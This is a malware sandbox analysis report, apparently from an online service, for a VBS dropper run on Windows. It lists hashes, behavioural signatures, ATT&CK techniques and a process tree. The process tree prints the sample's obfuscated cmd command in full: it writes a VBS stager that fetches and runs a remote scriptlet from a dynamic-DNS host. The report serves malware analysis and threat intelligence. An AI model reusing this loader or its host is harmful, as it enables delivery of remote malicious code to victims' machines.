Overview

overview

8

Static

static

8

27.FICH_33...6v.vbs

windows7_x64

8

27.FICH_33...6v.vbs

windows10-2004_x64

8

_.exe

windows7_x64

8

_.exe

windows10-2004_x64

8

Analysis

  • max time kernel
    146s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220414-es
  • submitted
    23-06-2022 14:52

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    27.FICH_33O3LcBJBPsZDE6v.vbs

  • Size

    7KB

  • MD5

    25926cb2b53f3be53b0999621d1f1ccf

  • SHA1

    9a073d7bd4b2f730f157f4612551504d16607256

  • SHA256

    665b376283df9d5e962860cc1d6cc2ec05157afff65d44b6d9ff64d8b6393941

  • SHA512

    8542f4c0815e8f161c4dc2151252454fc2dcc86da0a3160724f54d702d3ea99805be006d5bfdde65f68f3aba6556892d735515824a3fdf24f9de0dd05dc469bd

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 4 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies registry class 1 IoCs
  • Suspicious use of WriteProcessMemory 10 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\27.FICH_33O3LcBJBPsZDE6v.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4536
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" cmD ^/V/D/c EcHo function jzYA(VqB4eXG4vnLneHYp9) jzYA= replace(VqB4eXG4vnLneHYp9,"oIf6","w" ): End function: bZgICx10gbdN43 = jzYA("S=cri=pt=:H=ttps://oIf6fux02.hopto.org/g=1="): GetObject(AUrt(bZgICx10gbdN43)): function AUrt(c0zTSkrS20) AUrt= replace(c0zTSkrS20,"=","" ): end function > nul > %Public%\^L8DPGAESQ5.vbs |^start cMd /c start %Public%\^L8DPGAESQ5.vbs
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2216
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /S /D /c" EcHo function jzYA(VqB4eXG4vnLneHYp9) jzYA= replace(VqB4eXG4vnLneHYp9,"oIf6","w" ): End function: bZgICx10gbdN43 = jzYA("S=cri=pt=:H=ttps://oIf6fux02.hopto.org/g=1="): GetObject(AUrt(bZgICx10gbdN43)): function AUrt(c0zTSkrS20) AUrt= replace(c0zTSkrS20,"=","" ): end function 1>C:\Users\Public\L8DPGAESQ5.vbs"
        3⤵
          PID:1700
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" start cMd /c start C:\Users\Public\L8DPGAESQ5.vbs"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:3744
          • C:\Windows\system32\cmd.exe
            cMd /c start C:\Users\Public\L8DPGAESQ5.vbs
            4⤵
            • Checks computer location settings
            • Modifies registry class
            • Suspicious use of WriteProcessMemory
            PID:1076
            • C:\Windows\System32\WScript.exe
              "C:\Windows\System32\WScript.exe" "C:\Users\Public\L8DPGAESQ5.vbs"
              5⤵
              • Blocklisted process makes network request
              PID:4336

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Initial Access

    Execution

    Persistence

    Privilege Escalation

    Defense Evasion

    Credential Access

    Discovery

    Query Registry

    1
    T1012

    System Information Discovery

    2
    T1082

    Lateral Movement

    Collection

    Exfiltration

    Command and Control

    Impact

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Public\L8DPGAESQ5.vbs
      Filesize

      275B

      MD5

      6bac93f3f5d256c436d31e9496f33353

      SHA1

      906d675da017b53b3051cca5bf270655d68bc358

      SHA256

      f7c07264ac5931edc61c2bf838cffba41e119d9780876904c1c2d817ce5810c6

      SHA512

      ab576653b6030eec23d241a37805bad26cc13b38a0bf8957bbea0c010fd910e15ceece6fd4bacc784aadc1f8b1ed55c64b93ada35bcdfdb98d16afeb5b7c4804

      Download Submit
    • memory/1076-133-0x0000000000000000-mapping.dmp
      Download
    • memory/1700-131-0x0000000000000000-mapping.dmp
      Download
    • memory/2216-130-0x0000000000000000-mapping.dmp
      Download
    • memory/3744-132-0x0000000000000000-mapping.dmp
      Download
    • memory/4336-135-0x0000000000000000-mapping.dmp
      Download